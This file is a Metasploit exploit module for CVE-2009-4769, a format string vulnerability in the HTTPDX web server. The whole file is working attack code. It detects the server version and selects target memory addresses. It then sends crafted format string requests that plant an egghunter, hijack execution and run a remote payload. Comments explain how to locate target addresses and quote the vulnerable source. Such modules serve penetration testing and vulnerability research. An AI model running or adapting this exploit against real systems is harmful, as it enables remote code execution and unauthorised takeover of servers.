require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Egghunter
include Msf::Exploit::FormatString
def initialize(info = {})
super(update_info(info,
'Name' => 'HTTPDX tolog() Function Format String Vulnerability',
'Description'=> %q{
This module exploits a format string vulnerability in HTTPDX HTTP server.
By sending an specially crafted HTTP request containing format specifiers, an
attacker can corrupt memory and execute arbitrary code.
By default logging is off for HTTP, but enabled for the 'moderator' user
via FTP.
},
'Author' =>
[
'jduck'
],
'Version'=> '$Revision: 10150 $',
'References' =>
[
[ 'CVE', '2009-4769' ],
[ 'OSVDB', '60182' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Privileged' => true,
'Payload'=>
{
'Space'=> 1024,
'BadChars' => "\x00\x0a\x0d\x25\x2f\x3f\x5c",
'DisableNops' =>'True',
'StackAdjustment' => -1500
},
'Platform' => 'win',
'Targets'=>
[
[ 'Automatic Targeting', { 'auto' => true }],
[ 'httpdx 1.4 - Windows XP SP3 English',
{
'PadBytes' => 2,
'NumPops' => 22,
'Writable' => 0x64f87810,
'FlowHook' => 0x64f870e8
}
],
[ 'httpdx 1.4.5 - Windows XP SP3 English',
{
'PadBytes' => 2,
'NumPops' => 22,
'Writable' => 0x64f87810,
'FlowHook' => 0x64f870e8
}
],
[ 'httpdx 1.4.6 - Windows XP SP3 English',
{
'PadBytes' => 2,
'NumPops' => 22,
'Writable' => 0x64f87810,
'FlowHook' => 0x64f870e8
}
],
[ 'httpdx 1.4.6b - Windows XP SP3 English',
{
'PadBytes' => 2,
'NumPops' => 22,
'Writable' => 0x64f87810,
'FlowHook' => 0x64f870e8
}
],
[ 'httpdx 1.5 - Windows XP SP3 English',
{
'PadBytes' => 2,
'NumPops' => 22,
'Writable' => 0x64f87810,
'FlowHook' => 0x64f870e8
}
],
[ 'Debug target',
{
'PadBytes'=> 2,
'NumPops' => 22,
'Writable'=> 0xfeedfed5,
'FlowHook'=> 0xdeadbeef
}
]
],
'DefaultTarget'=> 0,
'DisclosureDate' => 'Nov 17 2009'))
=begin
NOTE: Even though all targets have the same addresses now, future targets may not.
To find a target:
1. open "core.dll" in IDA Pro
2. navigate to the "c_wildcmp" function
3. follow the xref to the first strlen
4. follow the xref to the imports area
5. copy/paste the address
6. the 'Writable' value should be anything after the last address IDA shows..
(preferably something above 0x0d, to avoid bad chars)
If crashes occur referencing strange values, 'NumPops' probably needs adjusting.
For now, that will have to be done manually.
=end
end
def check
version = get_version
if version
print_status("HTTPDX version detected : #{version}")
if (version =~ /1\.4/) or (version == "1.5")
return Exploit::CheckCode::Vulnerable
end
end
Exploit::CheckCode::Safe
end
def exploit
datastore['VHOST'] = ''
mytarget = target
if (target['auto'])
mytarget = nil
print_status("Automatically detecting the target...")
version = get_version
if not version
raise RuntimeError, "The server doesn't appear to be running a vulnerable version of HTTPDX"
end
re = Regexp.new(Regexp.escape(version)+' - ', true)
self.targets.each do |t|
if (re.match(t.name))
mytarget = t
break
end
end
if (not mytarget)
raise RuntimeError, 'Unable to automatically detect exploitation parameters'
end
print_status("Selected Target: #{mytarget.name}")
else
print_status("Trying target #{mytarget.name}...")
end
ip_length = Rex::Socket.source_address(datastore['RHOST']).length
num_start = ip_length + 2 + 29 + 3 + 3 + 2
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
fmtbuf = generate_fmtstr_from_buf(num_start, mytarget['Writable'], eh_stub, mytarget)
fmtbuf = '/' + fmtbuf.gsub(/%/, '%25').gsub(/ /, '%20')
print_status(" payload format string buffer is #{fmtbuf.length} bytes")
send_request_raw({ 'uri' => fmtbuf })
fmtbuf = generate_fmt_two_shorts(num_start, mytarget['FlowHook'], mytarget['Writable'], mytarget)
fmtbuf << eh_egg
fmtbuf = '/' + fmtbuf.gsub(/%/, '%25').gsub(/ /, '%20')
print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")
send_request_raw({ 'uri' => fmtbuf })
disconnect
select(nil, nil, nil, 1.5)
print_status(" triggering shellcode now")
print_status("Please be patient, the egg hunter may take a while...")
connect
handler
end
def get_version
info = http_fingerprint
if info and (info =~ /httpdx\/(.*) \(Win32\)/)
return $1
end
nil
end
end
=begin
also present in 1.5 (presumably all versions in between)
1.4/httpdx_src/ftp.cpp:
544//printf(out);
545char af[MAX] = {0};
546if(isset(out) && client->serve.log || client->serve.debug)
547snprintf(af,sizeof(af)-1,"%s\n%s%s\n",client->addr,client->cmd,out);
548if(isset(out) && client->serve.log)
549tolog(client->serve.accessl,af);
550if(isset(out) && client->serve.debug)
551printf(af);
1.4/httpdx_src/http.cpp:
172char af[MAX] = {0};
173if(client.serve.log || client.serve.debug)
174snprintf(af,sizeof(af)-1,"%s [%s] \"%s /%s HTTP/1.1\" %d\n",client.addr,timef,m[client.method-1],client.filereq,response.code);
175if(client.serve.log)
176tolog(client.serve.accessl,af);
177if(client.serve.debug)
178printf(af);
=end